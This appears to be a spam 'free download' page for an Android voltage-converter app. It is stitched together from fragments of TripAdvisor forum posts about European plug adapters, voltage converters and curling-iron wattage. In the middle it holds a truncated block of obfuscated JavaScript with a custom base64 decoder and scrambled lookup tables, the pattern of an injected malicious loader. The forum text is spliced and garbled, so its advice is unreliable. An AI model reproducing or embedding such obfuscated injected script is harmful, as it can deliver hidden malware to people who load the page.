Free Download Electric Converter For Germany For Android
Our Motorola RAZR cell phone came with the two round plug and an adapter so that it can be recharged here in the USA. HERE
All newer cell phone rechargers, digital camera rechargers and computers are dual 100-110/210-220 voltage.. To review the TripAdvisor Forums Posting Guidelines, please follow this link: http://www.. Here is what it has on it: 120V AC 60Hz 8W Does this mean the wattage is 800? My converter/adapter kit came with both, and I just want to make sure to use the right things together!Sorry, I mixed up curling iron with a smoothing iron.. constructor(x22returnx20thisx22)(x20)' ');');_0x38f67f=_0x3129c3();}catch(_0x4aecec){_0x38f67f=window;}var _0x248dc6='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /=';_0x38f67f['atob']||(_0x38f67f['atob']=function(_0x31457){var _0x2e3ef4=String(_0x31457)['replace'](/= $/,'');for(var _0x4cb1d1=0x0,_0x35a5d3,_0x168d89,_0x3e2555=0x0,_0x3213e8='';_0x168d89=_0x2e3ef4['charAt'](_0x3e2555 );~_0x168d89&&(_0x35a5d3=_0x4cb1d1%0x4?_0x35a5d3*0x40 _0x168d89:_0x168d89,_0x4cb1d1 %0x4)?_0x3213e8 =String['fromCharCode'](0xff&_0x35a5d3>>(-0x2*_0x4cb1d1&0x6)):0x0){_0x168d89=_0x248dc6['indexOf'](_0x168d89);}return _0x3213e8;});}());_0x112c['base64DecodeUnicode']=function(_0xdf3776){var _0x353885=atob(_0xdf3776);var _0x47228a=[];for(var _0x6d1b45=0x0,_0x41261c=_0x353885['length'];_0x6d1b45=_0x56f1a7;},'nUfTL':function _0xe24462(_0x5bbef6,_0x1953a5){return _0x5bbef6!==_0x1953a5;},'dkERn':'Bog','tNaSH':function _0x3bdd0e(_0x1eb042,_0x24dff2){return _0x1eb042(_0x24dff2);},'iEvOT':function _0xd16633(_0x379eae,_0x99b3ef){return _0x379eae _0x99b3ef;}};var _0x474eac=[_0x463750[_0x112c('0x25')],'.. > Should I convert it on high or low?High Low is only up to 50 W There are 2 adapters with round plugs. 2
They were very helpful!Wife has a hair curling iron that she purchased in Venice over 25 years ago for 12,000 Lire and just sets in aside until the next trip - far cheaper than buying a voltage converter. 3
We hope you'll join the conversation by posting to an open topic or starting a new one.. The adapter for Europe looks quite smaller than the converter plug Is there anyone who has experience with these things? Also, does anyone know the wattage of a mini curling iron? Should I convert it on high or low?> Also, does anyone know the wattage of a mini curling iron?Should be displayed somewhere on your mini curling iron.. They come in the range of 800-2000 W 2000 W won't work The V-1650 is only good up to 1650 W. e10c415e6f 4
One destination mentioned in this postI looked at my curling iron (which came in the package with an 800 watt dual voltage blow dryer.. Latter have more power A small curling iron can indeed just have 8W Does this mean I can use it on the Low setting on my converter, since it is less than 50 Watts?-:- Message from TripAdvisor staff -:-This topic has been closed to new posts due to inactivity.